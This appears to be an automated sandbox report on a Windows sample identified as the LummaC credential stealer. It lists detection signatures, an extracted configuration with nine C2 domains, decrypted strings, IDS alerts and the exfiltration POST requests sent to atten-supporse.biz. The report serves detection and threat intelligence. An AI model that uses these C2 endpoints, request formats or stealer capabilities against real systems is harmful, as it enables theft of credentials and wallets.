Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1572006
MD5:	52868af74ee73e05662d437482d99489
SHA1:	ee9cf98060ceebf880c722a87745601ca856fd30
SHA256:	fd853a7428efb478e0fed242b3a4dc8fbb704e52a91dfabb4297bb2c4cc19d22
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 3944 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 52868AF74EE73E05662D437482D99489)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["impend-differ.biz", "atten-supporse.biz", "formy-spill.biz", "zinc-sneark.biz", "print-vexer.biz", "dwell-exclaim.biz", "se-blurry.biz", "dare-curbys.biz", "covery-mover.biz"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2081424148.00000000019B7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2159575392.00000000019B9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2081779151.00000000019B7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2080931138.00000000019B7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2106519599.00000000019B7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2132681260.00000000019B7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2156812212.00000000019B7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2159595354.00000000019C9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2132681260.0000000001961000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2156812212.000000000195D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2106519599.000000000195F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 3944	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file.exe PID: 3944	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 3944	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 10 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:01.840562+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	104.21.80.1	443	TCP
2024-12-10T00:42:03.859465+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	104.21.80.1	443	TCP
2024-12-10T00:42:06.151959+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	104.21.80.1	443	TCP
2024-12-10T00:42:08.639831+0100	2028371	3	Unknown Traffic	192.168.2.5	49707	104.21.80.1	443	TCP
2024-12-10T00:42:11.472061+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	104.21.80.1	443	TCP
2024-12-10T00:42:13.925966+0100	2028371	3	Unknown Traffic	192.168.2.5	49709	104.21.80.1	443	TCP
2024-12-10T00:42:16.366705+0100	2028371	3	Unknown Traffic	192.168.2.5	49710	104.21.80.1	443	TCP
2024-12-10T00:42:20.281960+0100	2028371	3	Unknown Traffic	192.168.2.5	49716	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:02.583861+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49704	104.21.80.1	443	TCP
2024-12-10T00:42:04.586817+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:02.583861+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49704	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:04.586817+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49705	104.21.80.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:01.840562+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49704	104.21.80.1	443	TCP
2024-12-10T00:42:03.859465+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49705	104.21.80.1	443	TCP
2024-12-10T00:42:06.151959+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49706	104.21.80.1	443	TCP
2024-12-10T00:42:08.639831+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49707	104.21.80.1	443	TCP
2024-12-10T00:42:11.472061+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49708	104.21.80.1	443	TCP
2024-12-10T00:42:13.925966+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49709	104.21.80.1	443	TCP
2024-12-10T00:42:16.366705+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49710	104.21.80.1	443	TCP
2024-12-10T00:42:20.281960+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49716	104.21.80.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:00.288781+0100	2057921	1	Domain Observed Used for C2 Detected	192.168.2.5	60747	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:09.915625+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49707	104.21.80.1	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:42:16.370667+0100	2843864	1	A Network Trojan was detected	192.168.2.5	49710	104.21.80.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://atten-supporse.biz/p(	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/apiye;	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/8/	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/Cg3	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/(/	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/X/	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/api5	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/apiuG	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/Uidlye;	Avira URL Cloud: Label: malware

Found malware configuration

Source: file.exe.3944.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["impend-differ.biz", "atten-supporse.biz", "formy-spill.biz", "zinc-sneark.biz", "print-vexer.biz", "dwell-exclaim.biz", "se-blurry.biz", "dare-curbys.biz", "covery-mover.biz"], "Build id": "LOGS11--LiveTraffic"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: impend-differ.biz
Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: print-vexer.biz
Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: dare-curbys.biz
Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: covery-mover.biz
Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: formy-spill.biz
Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: dwell-exclaim.biz
Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: zinc-sneark.biz
Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: se-blurry.biz
Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: atten-supporse.biz
Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.2034627716.0000000005540000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LOGS11--LiveTraffic

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D76B7E CryptUnprotectData,

0_2_00D76B7E

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49710 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]	0_2_00D86170
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then push eax	0_2_00D6C36E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]	0_2_00D8C6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00D8C6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]	0_2_00D8C6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]	0_2_00D8C6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh	0_2_00D9E690
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]	0_2_00D6A960
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edx], bl	0_2_00D6CE55
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_00D9DBD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_00D69CC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh	0_2_00D9DCF0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00D77E82
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]	0_2_00D8BFDA
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]	0_2_00D8BFD3
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00D8A060
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]	0_2_00D85F7D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi+ebx], 00000000h	0_2_00D6C274
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, eax	0_2_00D82270
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00D945F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00D886F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp al, 2Eh	0_2_00D866E7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_00D8A630
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00D80717
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_00D80717
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00D886F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_00D8AAD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00D9CAC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi]	0_2_00D62B70
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]	0_2_00D96B20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00D9CCE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00D9CD60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_00D76E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, eax	0_2_00D76E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h	0_2_00D7CEA5
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00D9CE00
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add ebx, 03h	0_2_00D88F5D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h	0_2_00D74F08
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, edx	0_2_00D74F08
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_00D7D087
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_00D8D085
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_00D8D085
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_00D7D074
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_00D77190
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]	0_2_00D892D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ebx	0_2_00D892D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [00DA4284h]	0_2_00D85230
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00D8B3DE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00D8B3DE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, bx	0_2_00D8536C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_00D87307
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00D8B4BB
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00D67470
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00D67470
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00D8B475
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]	0_2_00D896D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]	0_2_00D87653
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_00D7597D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, eax	0_2_00D65910
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebp, eax	0_2_00D65910
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_00D76E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, eax	0_2_00D76E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	0_2_00D85920
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_00D75ADC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_00D79C10
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]	0_2_00D75EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00D81EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h	0_2_00D9DFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]	0_2_00D85F7D

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.5:60747 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49704 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49707 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49709 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49706 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49716 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49705 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49708 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49710 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49707 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49710 -> 104.21.80.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: atten-supporse.biz
Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: print-vexer.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: covery-mover.biz

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DDHQPF21IJA7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12805Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q3PW8LXT5YT0RLDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15065Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q6XCM8Q5QSJ159QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20555Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C4UKFQXE8KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1217Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3JSBVCBAMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570231Host: atten-supporse.biz

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: atten-supporse.biz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz

Source: file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
